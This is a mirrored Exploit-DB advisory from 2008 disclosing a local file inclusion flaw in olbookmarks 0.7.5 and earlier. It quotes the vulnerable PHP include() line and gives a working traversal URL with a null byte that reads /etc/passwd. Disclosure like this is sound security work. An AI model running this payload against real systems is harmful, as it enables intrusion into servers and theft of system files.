- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 6543
- Проверка EDB
-
- Пройдено
- Автор
- DUN
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-6410
- Дата публикации
- 2008-09-23
Код:
:::::::-. ... ::::::. :::.
;;, `';, ;; ;;;`;;;;, `;;;
`[[ [[[[' [[[ [[[[[. '[[
$$, $$$$ $$$ $$$ "Y$c$$
888_,o8P'88 .d888 888 Y88
MMMMP"` "YmmMMMM"" MMM YM
[ Discovered by dun \ dun[at]strcpy.pl ]
####################################################################
# [ olbookmarks <= 0.7.5 ] Local File Inclusion Vulnerability #
####################################################################
#
# Script site: http://sourceforge.net/project/showfiles.php?group_id=24742
#
# Vuln:
# http://site.com/olbookmarks/show.php?show=../../../../../../../etc/passwd%00
#
#
# Bug: ./olbookmarks-0.7.5/show.php
#
# ...
# if ($_REQUEST[root] != "" || $_REQUEST[lib] != "") exit;
#
# if ($_GET[show]!="")
# include("$root/$_GET[show].php");
# else
# include("$lib/bookmarkslist_view.php");
# ...
#
#
###############################################
# Greetz: D3m0n_DE * str0ke * and otherz..
###############################################
[ dun / 2008 ]
*******************************************************************************************
# milw0rm.com [2008-09-23]- Источник
- www.exploit-db.com
